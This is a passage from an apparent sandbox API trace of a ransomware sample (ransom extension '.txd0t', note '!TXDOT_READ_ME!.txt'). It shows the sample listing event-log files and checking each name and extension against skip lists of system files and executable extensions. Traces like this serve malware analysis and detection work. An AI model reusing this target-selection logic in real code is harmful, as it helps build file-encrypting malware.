[0071.941] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2=" ransom ") returned 1 [0071.941] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="debug.txt") returned 1 [0071.941] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="boot.ini") returned 1 [0071.941] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="desktop.ini") returned 1 [0071.941] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="autorun.inf") returned 1 [0071.941] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="ntuser.dat") returned -1 [0071.941] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="ntldr") returned -1 [0071.941] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="ntdetect.com") returned -1 [0071.941] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="bootfont.bin") returned 1 [0071.941] StrCmpIW (psz1="Microsoft-Windows-Ntfs%4WHC.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.941] PathFindExtensionW (pszPath="Microsoft-Windows-Ntfs%4WHC.evtx") returned=".evtx" [0071.941] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.941] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.941] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.941] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.941] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.941] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.941] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.941] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5fe5cb, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5fe5cb, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", cAlternateFileName="MI6AFE~1.EVT")) returned 1 [0071.941] StrCmpW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2=".") returned 1 [0071.941] StrCmpW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="..") returned 1 [0071.941] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.941] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.941] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned="C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" [0071.941] PathFindExtensionW (pszPath="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned=".evtx" [0071.941] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.941] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="bootsect.bak") returned 1 [0071.941] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="iconcache.db") returned 1 [0071.941] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="thumbs.db") returned -1 [0071.941] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2=" ransomware ") returned 1 [0071.942] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2=" ransom ") returned 1 [0071.942] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="debug.txt") returned 1 [0071.942] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="boot.ini") returned 1 [0071.942] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="desktop.ini") returned 1 [0071.942] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="autorun.inf") returned 1 [0071.942] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="ntuser.dat") returned -1 [0071.942] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="ntldr") returned -1 [0071.942] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="ntdetect.com") returned -1 [0071.942] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="bootfont.bin") returned 1 [0071.942] StrCmpIW (psz1="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.942] PathFindExtensionW (pszPath="Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned=".evtx" [0071.942] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.942] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.942] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.942] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.942] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.942] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.942] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.942] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe24cdef0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe24cdef0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-ReadyBoost%4Operational.evtx", cAlternateFileName="MIB9D2~1.EVT")) returned 1 [0071.942] StrCmpW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2=".") returned 1 [0071.942] StrCmpW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="..") returned 1 [0071.942] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.942] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.942] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-ReadyBoost%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-ReadyBoost%4Operational.evtx" [0071.942] PathFindExtensionW (pszPath="Microsoft-Windows-ReadyBoost%4Operational.evtx") returned=".evtx" [0071.942] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.942] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.942] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.942] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.942] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.942] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2=" ransom ") returned 1 [0071.943] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="debug.txt") returned 1 [0071.943] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="boot.ini") returned 1 [0071.943] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.943] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.943] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.943] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="ntldr") returned -1 [0071.943] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.943] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.943] StrCmpIW (psz1="Microsoft-Windows-ReadyBoost%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.943] PathFindExtensionW (pszPath="Microsoft-Windows-ReadyBoost%4Operational.evtx") returned=".evtx" [0071.943] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.943] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.943] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.943] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.943] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.943] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.943] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.943] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd125335f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd125335f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", cAlternateFileName="MI7A67~1.EVT")) returned 1 [0071.943] StrCmpW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2=".") returned 1 [0071.943] StrCmpW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="..") returned 1 [0071.943] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.943] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.943] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx" [0071.943] PathFindExtensionW (pszPath="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned=".evtx" [0071.943] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.943] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.943] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.943] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.943] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.943] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2=" ransom ") returned 1 [0071.943] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="debug.txt") returned 1 [0071.943] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="boot.ini") returned 1 [0071.943] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.943] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.944] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.944] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="ntldr") returned -1 [0071.944] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.944] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.944] StrCmpIW (psz1="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.944] PathFindExtensionW (pszPath="Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx") returned=".evtx" [0071.944] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.944] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.944] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.944] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.944] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.944] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.944] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.944] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SettingSync%4Debug.evtx", cAlternateFileName="MI3773~1.EVT")) returned 1 [0071.944] StrCmpW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2=".") returned 1 [0071.944] StrCmpW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="..") returned 1 [0071.944] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.944] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.944] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SettingSync%4Debug.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx") returned="C:\\Logs\\Microsoft-Windows-SettingSync%4Debug.evtx" [0071.944] PathFindExtensionW (pszPath="Microsoft-Windows-SettingSync%4Debug.evtx") returned=".evtx" [0071.944] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.944] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="bootsect.bak") returned 1 [0071.944] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="iconcache.db") returned 1 [0071.944] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="thumbs.db") returned -1 [0071.944] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2=" ransomware ") returned 1 [0071.944] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2=" ransom ") returned 1 [0071.944] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="debug.txt") returned 1 [0071.944] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="boot.ini") returned 1 [0071.944] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="desktop.ini") returned 1 [0071.944] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="autorun.inf") returned 1 [0071.944] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="ntuser.dat") returned -1 [0071.944] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="ntldr") returned -1 [0071.944] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="ntdetect.com") returned -1 [0071.945] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="bootfont.bin") returned 1 [0071.945] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Debug.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.945] PathFindExtensionW (pszPath="Microsoft-Windows-SettingSync%4Debug.evtx") returned=".evtx" [0071.945] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.945] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.945] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.945] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.945] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.945] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.945] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.945] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1fe2941, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd1fe2941, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SettingSync%4Operational.evtx", cAlternateFileName="MI36AA~1.EVT")) returned 1 [0071.945] StrCmpW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2=".") returned 1 [0071.945] StrCmpW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="..") returned 1 [0071.945] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.945] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.945] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SettingSync%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" [0071.945] PathFindExtensionW (pszPath="Microsoft-Windows-SettingSync%4Operational.evtx") returned=".evtx" [0071.945] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.945] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.945] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.945] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.945] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.945] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2=" ransom ") returned 1 [0071.945] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="debug.txt") returned 1 [0071.945] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="boot.ini") returned 1 [0071.945] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.945] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.945] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.945] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="ntldr") returned -1 [0071.945] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.945] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.945] StrCmpIW (psz1="Microsoft-Windows-SettingSync%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.945] PathFindExtensionW (pszPath="Microsoft-Windows-SettingSync%4Operational.evtx") returned=".evtx" [0071.946] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.946] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.946] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.946] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.946] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.946] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.946] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.946] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3852b12, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd3852b12, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", cAlternateFileName="MI2E2E~1.EVT")) returned 1 [0071.946] StrCmpW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2=".") returned 1 [0071.946] StrCmpW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="..") returned 1 [0071.946] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.946] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.946] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" [0071.946] PathFindExtensionW (pszPath="Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned=".evtx" [0071.946] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.946] StrCmpIW (psz1="Microsoft-Windows-Shell-Core%4ActionCenter.evtx", psz2="bootsect.bak") returned 1 [0071.946] StrCmpIW 